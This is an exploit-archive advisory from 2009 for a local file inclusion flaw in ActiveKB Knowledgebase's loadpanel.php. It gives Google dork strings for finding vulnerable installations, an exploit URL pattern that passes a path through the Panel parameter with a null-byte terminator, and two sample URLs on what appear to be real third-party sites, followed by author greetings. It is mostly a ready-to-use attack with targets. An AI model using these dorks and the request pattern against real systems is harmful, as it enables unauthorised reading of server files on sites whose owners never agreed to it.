[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ActiveKB Knowledgebase (loadpanel.php Panel) Local File Inclusion Vuln
# Published : 2009-04-03
# Author : Angela Chang
# Previous Title : iDB 0.2.5pa SVN 243 (skin) Local File Inclusion Exploit
# Next Title : glFusion <= 1.1.2 COM_applyFilter()/cookies Blind SQL Injection Exploit
[o]------------------------------------------------------------------------------------[x]
| Local File Inclusion Vulnerability |
[o]------------------------------------------------------------------------------------[o]
| Software : ActiveKB Knowledgebase version X.X |
| Vendor : http://www.interspire.com/activekb/ |
| Date : 02 April 2009 |
| Author : Angela Chang |
| Contact : mizz_4ng3l@yahoo.com |
[o]------------------------------------------------------------------------------------[o]
[??] Google Dork
"Powered by ActiveKB Knowledgebase Software"
inurl:loadpanel.php?Panel=
[??] Vulnerable
./loadpanel.php
[??] Exploit
http://[site]/[path]/loadpanel.php?Panel=[LFI]%00
[??] Sample
http://help.theedweb.com/activekb/loadpanel.php?Panel=[LFI]%00
http://my.myriadnetwork.com/kb//loadpanel.php?Panel=[LFI]%00
[o]------------------------------------------------------------------------------------[x]
| Greetz : Speciale Thanks FoR : |
[o]------------------------------------------------------------------------------------[o]
| -------- Vrs-hCk , Nyubi (Solpot) , OoN_Boy ---------- |
[o]------------------------------------------------------------------------------------[o]
# www.Syue.com [2009-04-03]